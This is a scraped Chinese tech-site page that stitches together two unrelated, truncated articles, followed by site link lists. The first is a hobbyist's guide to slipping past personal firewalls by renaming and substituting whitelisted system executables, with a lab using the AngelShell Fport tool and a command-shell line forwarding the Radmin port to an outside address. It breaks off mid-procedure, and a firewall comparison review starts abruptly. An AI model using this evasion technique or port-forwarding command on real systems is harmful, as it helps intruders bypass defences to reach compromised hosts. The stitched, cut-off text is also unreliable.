一直以来都有一个梦想:偶要是能发现些漏洞或BUG什么的该多好啊!于是整天对着电脑瞎弄瞎研究,研究什么呢?研究如何突破防火墙(偶这里指的防火墙是软体型的个人防火墙,硬件的偶也没条件。)嘿嘿,你还别说,还真没白研究,还真给偶发现了大多数防火墙的通病。这个BUG能让我们欺骗防火墙来达到访外的目的,具体情况是怎么样的呢?请看下面的解说!
首先,我要介绍一下Windows系统特性,当一个程序运行时,它不能删除,但却能够改名!而当系统里的被保护程序遭到删除或损坏或改名时系统就会及时调用备份文件给予还原!我再讲讲防火墙,大家都知道许多防火墙的“应用程序规则”里一般默认就会让IE浏览器(iexplore.exe)、Outlook Express(msimn.exe)、lsass.exe、spoolsv.exe、MSTask.exe、winlogon.exe、 services.exe、svchost.exe通过,而大多的防火墙认为只要是与规则里的路径及文件名相同就Pass!以这样的检测方法来决定是否放行,但它却完全没考虑到如果是别的文件替换的呢?——就相当于古装片里的易容术,易容后就认不得了!这就给了我们机会,我们可以利用这个BUG来欺骗防火墙来达到访外的目的!
小知识:其实现在大多木马采用的DLL插线程技术也就是利用了这个原理,它们首先隐蔽的开启一个认证放行的程序进程(如Iexplore.exe进程),接着把DLL型木马插入这个线程内,然后访外时就可轻松突破防火墙的限制了——因为防火墙是不会拦截已认证放行的程序的。
原理讲完了,我们现在讲讲该如何利用这个BUG了!这里我用虚拟机做实验,制造如下条件:
为了更符合现实,我给服务器安装了“天网防火墙”、Radmin(但由于防火墙指定了访问IP地址,所以没办法正常连接!),MSSQL SERVER、Serv-u。首先我们用常用的方法进行端口转发,看看防火墙有什么反应!
第一步,启用AngelShell Ver 1.0里的Fport(用来进行端口转发的服务端,几乎可以转发任何端口),然后在本地用FportClient(用来进行端口转发的客户端)监听好!
第二步,直接在CMDSHELL里运行“e:\www\fport.exe 4899 192.168.1.1 7788”,这时我们看到虚拟机里的“天网”对Fport马上进行了拦截。
一篇关于防火墙的冲突的文章
近来试用了比较流行的几个防火墙,在使用过程中进行了一些比较,记下了些文字,希望对一些不知道该如何选择的提供一些参考。同时希望交流,共同提高。
只是比较之用,没有广告之意。使用全在各有所爱。
一.Kaspersky(卡巴斯基)防火墙(Kaspersky Anti-Hacker)
1.设置简单,和Kaspersky(卡巴斯基)杀毒软件一起使用没有冲突,与ZoneAlarm Pro version:5.5.094.000运行也可以,没见死机。
2.内存占用小,刚启动时6M左右,最小时1M不到。
3.可以查看正在打开的端口,正在连接网络的应用程序及连接地址、端口。
4.可以为每个程序定义规则(阻止、允许)及安全类型(浏览、文件传送、信息发送等等)。发现有程序连接时会提示,并允许选择自定义。
5.可以定义包过滤规则。默认已经定义一些。不过自定义的包过滤规则有点简单。在一条规则定义几个端口时不太方便(只能选单个或区间)。
6.本地连接的时候没有提示。比如通过代理软件上网,浏览器再通过代理软件连接的时候不会对浏览器连接网络进行提示。
二、ZoneAlarm Pro 5.5.094
1.资源占用较大,两个进程,zlclient.exe占用4M左右, vsmon.exe占用9M左右。启动还算快。和Kaspersky(卡巴斯基)杀毒软件共处相安无事,和Norton防病毒软件一起工作正常。和 Sygate Personal Firewall可能有冲突。
2.默认设置还算简单,按默认设置即可阻止很多可疑连接。
3.功能强大,广告过滤,邮件过滤都不错。可对每一程序设置连接规则。
4、防火墙的专家设置项可以完成难度比较大的规则设置,设置规则还算简单,根据参考可以自定义完成。
5、升级到6.0后资源占用变得很大,启动响应比较慢。
6、对于网关的ARP保护并没有效果,同局域网机器可以使用ARP欺骗进行攻击致使无法上网。使用专家项设置IP和MAC绑定也无效果。经查ZoneAlarm 存在一个安全问题,允许未授权用户在本地局域网安全设置下连接到该防火墙保护的主机。
三、F-Secure Distributed Firewall 5.5
与天网发生冲突,安装第一次重新启动后出现蓝屏然后重启。提示信息表示与sknfw.sys文件有关。最后没有使用就删除了,可惜。
四、Outpost Firewall pro 2.7.492.416
1、与天网发生冲突,安装第一次重新启动后出现蓝屏然后重启。提示信息表示与sknfw.sys文件有关。删除sknfw.sys后再重新安装则没有出现这个问题。
2、与ZoneAlarm Pro有冲突,可以同时安装两个,不过只能运行其中一个,不然出现死机。与McAfee.VirusScan.Enterprise.v80共处没有出现什么冲突。
3、启动后只有一个进程outpost.exe,Outpost占用内存极小,刚启动时20M左右,最小化正常后只有2M左右。
4、功能强大,设置复杂。不过按其默认设置基本上可以满足上网要求。
5、可以查看正在连接网络的应用程序、连接IP、端口,系统正在打开的端口。已经发送和接收的TCP,UDP数据流量。阻止的各项统计。
6、支持插件,默认安装了active content,ads,attachment quarantine,attack detection,content,dns cache等插件。使用较多的是active content(包括pop-up windows,activeX controls,javascripts,vbscripts,cookies等的过滤设置)和ads(广告过滤,
【相关文章】
|
|||
| 名称:SQL Server数据库管理精品黄皮书 简介:书中文章经过精挑细选,便于用户能根据自己的实际工作和学习,快速在本书寻找到相关资料。内容涵盖了SQL Server的安装与升级、语句查询、数据备份和恢复、自动化任务、数据同步、数据字典、安全和预防、性能和优化、集群等各方面应用信息,以及DBA管理人员在数据库管理工作中 |
|||
| 名称:2007路由技术大全 简介:《2007路由技术大全》由51CTO.com网站特别策划制作,该书包括路由器技术、路由器产品、路由器配置、安全设置、路由器故障处理、路由器密码恢复,以及广大网友在实践使用中的心得经验和技巧文章,内容注重实用性,适用于初学者入门,也适合多年从业者提高,是一本实践和理论完 |
|||
| 名称:网络安全精品应用黄皮书 简介:《2007精品网络安全黄皮书》包括了9个大类24个小类, 800余篇文章,内容包含了熊猫烧香病毒、DDOS攻击、ARP病等热点问题的介绍及解决方案。从病毒查杀、防范、系统、数据等各方面的安全设置到黑客技术的了解、防范,涉及到了安全应用的全部领域, 由浅至深内容全面。 |
|
||||
| · SOA 面向服务架构 · SQL Server 2008/2005.. · Apache技术专题 · 三层交换技术专题 · SQL Server入门到精通 · Windows远程桌面应用 · C#技术开发指南 · Apache技术专题 |
· Windows集群服务应用 · C#技术开发指南 · 国际文档格式标准开战 · 路由器设置与口令恢复 · Linux 集群技术专题 · PHP开发应用手册 · SOA 面向服务架构 · 企业数据恢复指南 |
|||
|
||||
| · SQL Server入门到精通 · SQL Server 2008/2005.. · SOA 面向服务架构 · Apache技术专题 · C#技术开发指南 · 三层交换技术专题 · Apache技术专题 · C#技术开发指南 |
· Windows远程桌面应用 · 企业数据恢复指南 · Windows集群服务应用 · 路由器设置与口令恢复 · Linux 集群技术专题 · SOA 面向服务架构 · 了解统一威胁管理(UTM).. · 反垃圾邮件技术应用 |
|||
